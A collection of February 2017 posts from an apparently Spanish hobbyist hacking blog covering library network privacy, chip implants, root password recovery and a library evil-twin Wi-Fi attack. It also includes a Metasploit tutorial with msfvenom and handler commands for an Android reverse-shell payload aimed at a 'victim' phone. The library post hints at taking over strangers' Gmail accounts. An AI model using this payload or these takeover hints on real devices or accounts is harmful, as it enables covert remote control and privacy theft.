22 feb 2017

Seguridad en las Bibliotecas

Hola Hackers! Hoy os vengo a hablar de un tema que pasa mucho desapercibido pero lo valoro importante y este es la privacidad en los sistemas de las bibliotecas.

Os comento como va el tema. Todo empieza cuando un usuario cualquiera se conecta a la red pública de la bibloteca, sea por Wi-Fi o por los ordenadores que ellos te ponen para disfrutarlos en una hora por sesión.

Como es bien sabido por todos, una red Wi-Fi abierta es gloria para muchos a pesar de tener el cartel de peligro dibujado al inicio de la red, veamos el porque.

Una red pública, siempre decimos, que hay que mantener un especial cuidado, siendo yo el primero que recomienda los proxys ya que, no es una solución del todo anónima, pero si dentro de la red.
En una red como esta NO ESTÁ PERMITIDO el uso de proxys, o al menos yo he intentado conectarme a uno y me daba:

  1. Bloqueo por los DNS
  2. Un aviso continuo de que el certificado de seguridad caducó y que debe de dar la excepción.
Dándome esas dos opciones me da que vamos a ir descartando el proxy, así que usaremos la navegación privada para al menos no dejar rastro de donde entramos y para que entramos.
Por desafortunada suerte, veo que esa opción no se usa mucho.
He llegado a ver en esos ordenadores cuentas de correo electrónico, accesos a la Seguridad Social y un sinfín de más cosas que llevan por bandera la etiqueta de "Datos Personales" o "Confidencial" y no solo eso, sino cuentas de correo electrónico, de GMail, que con un correo temporal puedes hacer que te manden la contraseña de ese correo electrónico.

No nos quedemos ahí. Tenemos también en estos ordenadores currículums, con números de Seguridad Social, DNI o datos sensibles.
Os puedo dejar claro que hay muchos diciendo saber de informática pero creo que la seguridad es su asignatura pendiente.

Como buen samaritano, yo uso muchos ordenadores y me encargo de dejarlos limpios ya que, por mucho cuidado que uno tenga, algo queda.

Por último queda mandar un correo a estas personas, a través de un mail temporal exponiéndoles la situación y unos consejos de seguridad que ya casi son plantilla pero bueno, vemos que la seguridad no les importa a muchos hoy en día.

Sobre el tema de los que se conectan por Wi-Fi, resumido, todo lo anterior además de poder acceder a tu teléfono móvil, ordenador, tablet o incluso tu propio cuerpo (si quieres saber el motivo de esto último entra aquí ¿Implante de chips a humanos? )

En fin, solo me queda despedirme de esta entrada por hoy, siguiendo insistiendo desde la sombra (ya que si me persono o no están, o dicen que eso lo lleva el técnico, que no saben nada) a que mejoren la seguridad de la red que ofrencen, siendo usada por los mismos bibliotecarios, además de por donde se conecta el ordenador (un XP) donde están todos nuestros datos.

Att. 3m4nu3l1, desde uno de estos ordenadores "bomba"

20 feb 2017

¿Implantes de chips a humanos? | Crítica de noticia

Buenos días hackers, hoy leyendo mi Twitter he llegado a una noticia del periódico "El Mundo" la cual versa sobre una empresa en  bélgica que implanta chips a sus trabajadores, y no, no es "El Mundo Today".

La noticia versa de la empresa NewFusion , una agencia de medios digitales la cual decidió colocar estos chips para tener mayor seguridad a la hora de coger los ordenadores o acceder a zonas restringidas, llevando el Doble Factor de Autenticación (Algo que se, que soy, que tengo) a límites extremistas aún calificándolo miembros como un acercamiento del ser humano al IoT.

El chip en cuestión, del tamaño de un grano de arroz.

Esta tecnología no es tan lejana como parece, es más, es casi la misma que los microchips de nuestras mascotas pero aún así, en un mundo que intentamos estar más seguros de nuestra intimidad, la estamos perdiendo a pasos agigantados como este además que nuestro propio cuerpo será hackeado.

Los métodos para instalarlo y comprarlo son "graciosos" (por no decir locos). El chip se vende por 20 céntimos la unidad en China aunque, siendo listos los belgas, lo han comprado en EEUU aunque  la unidad salga a 100€. El método en sí lo realiza un tatuador (sí, un tatuador coloca elementos inteligentes) con una aguja como las usadas para sacar sangre y se introduce en la mano, entre el índice y el pulgar.

Pero no, de momento no te obligan a ponerlo ya que pueden seguir con la tarjeta de acceso o incluso anillos o brazalete con la tecnología integrada.

Para acabar, si eres como yo, fan del programa de Los Simpsons, sabrás que ya salió el caso de una empresa que implanta chips en sus empleados ;)



18 feb 2017

Mi experiencia con W8 y Kali en mismo ordenador + Asesinato

Que tal! Hoy os vengo a hablar sobre mi experiencia e intento de que compaginen Kali Linux y Windows 8 en un mismo PC y los resultados finales. Al final de la entrada también voy a comentar una noticia que he visto y es verídica a pesar de no parecerlo así que si quieres saber como acaba la historia sigue leyendo ;)

14 feb 2017

Crear PAYLOAD para Android con Metasploit

En el tutorial de hoy os voy a enseñar como crear un Payload con la aplicación Metasploit integrada en Kali Linux ya que en la distro nos viene más completa que descargándola de Internet.

PAYLOAD
Un payload es un virus o malware que consiste en realizar una acción (normalmente maliciosa) en un dispositivo que esté conectado dentro de nuestra red o fuera de otra. El fin que tiene un payload es tener control total y remoto del dispositivo que se quiera interceptar en cuestión.

METASPLOIT
Metasploit es una herramienta de hacking y pentesting destinada a la explotación y tests de penetración de una manera sencilla. Esta herramienta es conocida por ser como una "navaja suiza" para los hackers y prácticamente todas las distribuciones de Linux lo traen.

¿COMO CREAMOS EL PAYLOAD?

1. Abrimos nuestro sistema operativo de seguridad preferido, luego la aplicación "Metasploit" y escribimos el comando"msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > name.apk"



El comando se divide en varias partes que son:
  • msfvenom -> Es la aplicación donde desarrollamos el payload
  • -p -> Estamos indicando que vamos a realizar un payload
  • android/meterpreter/reverse_tcp -> Es el tipo de payload que necesitamos
  • LHOST -> Es la IP que usará la aplicación para comunicarse con nosotros. Si se va a hacer dentro de la red nuestra el valor es 192.168.1.1 pero si es fuera de nuestra red deberá ser nuestra IP Pública
  • LPORT -> Es el puerto donde se conectará nuestra aplicación. Si la red es interna yo uso el puerto 8080 pero si es en una red exterior deberemos abrir el puerto que deseemos
  • R > name.apk -> Es la ruta donde almacenaremos el payload y con que nombre. La ruta por defecto (cuando ponemos solo el nombre, es la carpeta personal o la de root).
2. Una vez hayamos introducido el payload en el móvil de nuestra víctima ponemos los siguientes comandos:
  • msfconsole ->Iniciamos la aplicación de monitoreo
  • use multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp -> Indicamos cual payload queremos detectar
  • set LHOST xxxx -> Indicamos la IP asignada al payload.
  • set LPORT xxxx -> Indicamos el puerto asignado al payload
  • exploit
Una vez llegados a este punto deberemos tener control total sobre el teléfono.

AVISO: Este tutorial debe ser usado con fines didácticos y en un dispositivo propio ya que sino es un delito de privacidad o en todo caso con el consentimiento del dueño del terminal.

13 feb 2017

Como recuperar clave de ROOT para distros de Linux

Hoy os traigo una guía donde podréis recuperar vuestra clave de superusuario en caso de olvidarla o extraviarla.

Comenzamos iniciando un live CD en la máquina, en mi caso uno de Kali Linux y a continuación abrimos un terminal y escribimos el siguiente comando:


Si os da error poned primero "sudo su" y listo.

Con este comando se nos mostrará una lista de las particiones que hay en la máquina, deberemos anotar el que tiene el asterisco ya que ahí se encuentran los ficheros del sistema.



Una vez obtenida la partición tipeamos los comandos "mkdir /tmp/sdax" y "mount /dev/sdax /tmp/sdax"



El primer comando crea el directorio donde montaremos la partición, el segundo es montarla. La x de sdax la cambiamos por el número de la partición.
Una vez montado la partición entramos en el directorio raíz con el comando "chroot /tmp/sdax" y escribimos el comando "passwd root" para cambiar la clave.


Por último desmontamos la partición con "umount /tmp/sdax" y reiniciamos la máquina.


Cerramos el live CD, retiramos el CD o el USB y reiniciamos la máquina y ponemos el usuario y la clave que escogimos antes.


Con esto tendríamos por recuperada la clave de superusuario. Para cualquier otro usuario el procedimiento es el mismo pero cambiando en comando "passwd root" el root por el nombre de usuario.


6 feb 2017

SEGURIDAD INFORMÁTICA | ROBAN VARIAS IDENTIDADES EN BIBLIOTECA

Normalmente cuando uno va a la biblioteca va a estudiar, a leer o a hacer trabajos.
También hemos dicho que nadie está seguro si tiene un Smartphone pero, ¿que pasa si combinamos ambos?

En el día de hoy, 06 de Febrero, a las 19:30 aprox. ocurrió un fenómeno extraño el cual provocaba que en nuestros móviles se conectaran a routers "ficticios" que tenían los nombres de routers asociados a nuestros móviles, es más, si entrábamos en la configuración del Wi-Fi de nuestros móviles podíamos ver varias conexiones abiertas pero, ¿cómo accedo sin quererlo a esa red?

Sencillo, si tienes una red guardada en Android o iOS, si detecta el SSID (Nombre de Red) de una guardada anteriormente el móvil se conecta a este, así sin más.

El ataque, según nos informan desde Alcalá de Guadaira, se realizó como dije anteriormente aproximadamente a las 19.30h en la Casa de la Cultura así que si has estado en ese tiempo ahí puedes haber sufrido un robo de los datos de tu teléfono así que os recomiendo revisar lo que tenéis guardado en el teléfono e incluso formatear el teléfono ante la posibilidad de virus que pueden monitorizar el teléfono en cualquier parte.

Sin más os dejo el acertijo de esta semana...

Juan, Marta y Francisco estaban en la biblioteca en el momento del ataque, uno de los nombres de los routers falsos era el de Marta pero no ha sido infectada ni atacada. ¿Cómo es posible?